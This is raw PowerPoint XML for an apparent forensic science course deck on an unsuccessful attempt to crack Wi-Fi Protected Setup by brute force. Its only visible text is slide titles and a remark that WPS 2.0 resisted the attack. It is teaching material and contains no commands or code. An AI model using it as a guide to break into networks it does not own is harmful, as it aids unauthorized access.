                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D4965"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="✗"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3D4965"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1371600" lvl="2" indent="-355600">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D4965"/>
              </a:buClr>
              <a:buSzPts val="2000"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="■"/>
              <a:defRPr sz="2000">
                <a:solidFill>
                  <a:srgbClr val="3D4965"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1828800" lvl="3"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4pPr>
            <a:lvl5pPr marL="2286000" lvl="4"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5pPr>
            <a:lvl6pPr marL="2743200" lvl="5"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6pPr>
            <a:lvl7pPr marL="3200400" lvl="6"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7pPr>
            <a:lvl8pPr marL="3657600" lvl="7"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8pPr>
            <a:lvl9pPr marL="4114800" lvl="8" indent="-342900">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="3D4965"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buFont typeface="Dosis"/>
              <a:buChar char="■"/>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:srgbClr val="3D4965"/>
                </a:solidFill>
                <a:latin typeface="Dosis"/>
                <a:ea typeface="Dosis"/>
                <a:cs typeface="Dosis"/>
                <a:sym typeface="Dosis"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="160" name="Google Shape;160;p1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="90619" y="4722737"/>
            <a:ext cx="548700" cy="393600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr lvl="1">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr lvl="2">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr lvl="3">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl4pPr>
            <a:lvl5pPr lvl="4">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl5pPr>
            <a:lvl6pPr lvl="5">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl6pPr>
            <a:lvl7pPr lvl="6">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl7pPr>
            <a:lvl8pPr lvl="7">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl8pPr>
            <a:lvl9pPr lvl="8">
              <a:buNone/>
              <a:defRPr sz="1200">
                <a:solidFill>
                  <a:srgbClr val="3C78D8"/>
                </a:solidFill>
                <a:latin typeface="Sniglet"/>
                <a:ea typeface="Sniglet"/>
                <a:cs typeface="Sniglet"/>
                <a:sym typeface="Sniglet"/>
              </a:defRPr>
            </a:lvl9pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en"/>
              <a:t>‹#›</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="162" name="Picture 161" descr="Image result for University of Baltimore"/>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40320" y="4705350"/>
            <a:ext cx="1503680" cy="438150"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Rectangle 1"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-76180" y="4992580"/>
            <a:ext cx="699230" cy="215444"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="0" i="0" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
                <a:cs typeface="Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>
              </a:rPr>
              <a:t>SlidesCarnival</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
              <a:cs typeface="Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Rectangle 162"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1932544" y="4854226"/>
            <a:ext cx="3993401" cy="43088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accent1">
                    <a:lumMod val="60000"/>
                    <a:lumOff val="40000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Bahnschrift Light Condensed" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>M.S. in Forensic Science - High Technology Crime: wxu@ubalt.edu</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="800" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
              <a:latin typeface="Brush Script MT" panose="03060802040406070304" pitchFamily="66" charset="0"/>
              <a:cs typeface="Adobe Devanagari" panose="02040503050201020203" pitchFamily="18" charset="0"/>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12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="982980" y="1161050"/>
            <a:ext cx="7475120" cy="1159800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0"/>
              <a:t>Wi-Fi Protected Setup (WPS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>) Cracking (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Unsuccessful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4000" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr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02910" y="0"/>
            <a:ext cx="6538180" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2568689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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1603057" y="0"/>
            <a:ext cx="5937885" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2618967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pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="855164" y="0"/>
            <a:ext cx="7433671" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2095901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Attack failed</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="747925" y="1302837"/>
            <a:ext cx="6140400" cy="1158423"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>My WPS version is 2.0. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Only version 1.0 will work</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="38222" r="45554" b="48889"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="843761" y="2620712"/>
            <a:ext cx="7471976" cy="1532188"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="218495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Text Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A misconfiguration problem </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3816660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File download</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95864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191087" y="1360031"/>
            <a:ext cx="7020905" cy="1981477"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="248563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Verify file</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>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pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="950258" y="1366712"/>
            <a:ext cx="6194480" cy="2313748"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2351148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Router Setting</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Subtitle 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Slide Number Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4852988"/>
            <a:ext cx="549275" cy="290512"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="ct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665966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9408" y="278091"/>
            <a:ext cx="7562679" cy="4299665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2075051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pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Picture 2"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="859836" y="0"/>
            <a:ext cx="7424328" cy="5143500"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2649516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Brute force password</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idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4722813"/>
            <a:ext cx="549275" cy="393700"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" lvl="0" indent="0" algn="l"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4202619279"/>
      </p:ext>
    </p:extLst>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/theme/theme1.xml><?xml version="1.0" encoding="utf-8"?>
<a:theme xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main"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TotalTime>
  <Words>122</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>On-screen Show (16:9)</PresentationFormat>
  <Paragraphs>32</Paragraphs>
  <Slides>13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Sniglet</vt:lpstr>
      <vt:lpstr>Dosis</vt:lpstr>
      <vt:lpstr>Brush Script MT</vt:lpstr>
      <vt:lpstr>Arial</vt:lpstr>
      <vt:lpstr>Adobe Devanagari</vt:lpstr>
      <vt:lpstr>Bahnschrift Light Condensed</vt:lpstr>
      <vt:lpstr>Friar template</vt:lpstr>
      <vt:lpstr>Wi-Fi Protected Setup (WPS) Cracking (Unsuccessful)</vt:lpstr>
      <vt:lpstr>Overview</vt:lpstr>
      <vt:lpstr>File download</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Verify file</vt:lpstr>
      <vt:lpstr>Router Setting</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Brute force password</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>PowerPoint Presentation</vt:lpstr>
      <vt:lpstr>Attack failed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Frank Xu</cp:lastModifiedBy>
  <cp:revision>118</cp:revision>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-23T04:46:44Z</dcterms:modified>
</cp:coreProperties>
</file>